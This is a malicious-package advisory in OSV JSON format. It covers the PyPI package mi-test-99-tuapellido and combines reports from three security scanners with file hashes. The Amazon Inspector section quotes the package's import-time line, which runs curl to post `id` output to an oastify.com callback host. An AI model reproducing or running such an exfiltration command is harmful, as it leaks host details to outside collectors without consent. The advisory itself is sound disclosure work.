{"id":"MAL-2026-6478","summary":"Malicious code in mi-test-99-tuapellido (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39)\nOn every import, the package's top-level __init__.py runs `os.system(\"curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)\")`. This unconditionally executes a shell pipeline that POSTs the output of the `id` command (current uid/gid/group membership) to a Burp Suite Collaborator (oastify.com) subdomain — an out-of-band callback service used to confirm remote code execution and exfiltrate data. The behavior fires on `import mi_test_99` with no user gating, no relation to any advertised functionality, over plaintext HTTP. Package metadata is placeholder-shaped (name contains the literal Spanish placeholder `tuapellido`/'your-surname', author fields are `Tu Nombre \u003ctu@email.com\u003e`, pyproject comment reads `CAMBIA ESTO por un nombre único`), consistent with a dependency-confusion or namespace-squat proof-of-concept payload. Whether intended as a test or a live attack, any installer that imports this package leaks host identity to an attacker-controlled collector and demonstrates an arbitrary-shell-exec channel.\n\n## Source: kam193 (060712d1fb233a9a9be7115401704cd0ab7cb4f3e15dc1f58ad5ef4685d5fe37)\nInstalling the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.\n\n\n---\n\nCategory: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.\n\n\nCampaign: GENERIC-standard-pypi-install-pentest\n\n\nReasons (based on the campaign):\n\n\n - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n## Source: ossf-package-analysis (2d2263c69d2201d6f365635468e2e0b55f4bd4140098f9268223b8f6729af033)\nThe OpenSSF Package Analysis project identified 'mi-test-99-tuapellido' @ 99.9 (pypi) as malicious.\n\nIt is considered malicious because:\n\n- The package communicates with a domain associated with malicious activity.\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-06-25T23:16:24.293476517Z","published":"2026-06-25T21:11:03Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-06-25T22:03:19.964581678Z","source":"kam193","sha256":"060712d1fb233a9a9be7115401704cd0ab7cb4f3e15dc1f58ad5ef4685d5fe37","id":"pypi/GENERIC-standard-pypi-install-pentest/mi-test-99-tuapellido","versions":["99.9"],"modified_time":"2026-06-25T21:39:10.396761Z"},{"import_time":"2026-06-25T22:03:16.523052946Z","source":"ossf-package-analysis","versions":["99.9"],"sha256":"2d2263c69d2201d6f365635468e2e0b55f4bd4140098f9268223b8f6729af033","modified_time":"2026-06-25T21:11:03Z"},{"import_time":"2026-06-25T23:00:33.896718873Z","source":"amazon-inspector","sha256":"4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39","id":"IN-MAL-2026-007551","versions":["99.9"],"modified_time":"2026-06-25T22:26:43Z"}]},"references":[{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/mi-test-99-tuapellido"},{"type":"PACKAGE","url":"https://pypi.org/project/mi-test-99-tuapellido/99.9/"}],"affected":[{"package":{"name":"mi-test-99-tuapellido","ecosystem":"PyPI","purl":"pkg:pypi/mi-test-99-tuapellido"},"versions":["99.9"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mi-test-99-tuapellido/MAL-2026-6478.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"hashes":{"md5":"1b10c71755c89bb7bcdee87954f54e60","blake2b_256":"f16d65b3e09b200c6889e0d05c831f49391e479f7ca428fc76b29483dcf5220e","sha256":"eb7f289692fe89595fc62b75d4b0e7084bfa68b5a0e6f1abb2c69f70974a6e2d"},"filename":"mi_test_99_tuapellido-99.9-py3-none-any.whl"},{"hashes":{"md5":"2fcc9fab43138fafd5ac0cb892bb8437","blake2b_256":"7bbee0f881b6f3d47c103747cef9deb49eba12c8f9fa91895df16c1411007a2f","sha256":"afd2db2273ebb3ef6018efdcbcdf4eeb3e16e9a81c4745776cb2dfbc7792ae89"},"filename":"mi_test_99_tuapellido-99.9.tar.gz"}],"evidence_files":[{"path":"src/mi_test_99/__init__.py","sha256":"3f76ca7a046099a8461c0e95dfa940aeb0a373c5945be4e931ce29336144288f","tlsh":"7ab012a84804143401c0990020a880c5841258caeb77349585404d148405ad51231d31"},{"path":"pyproject.toml","sha256":"4ee7ec2c31f1f2e06283c97083eb1ee10cdd98868da1034358f36e2e750e0c72","tlsh":"f8f00e02a4c76f8a37c70084340d9501dcb091172ac4cc2a23ed874c9f5e84a85fcd25"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}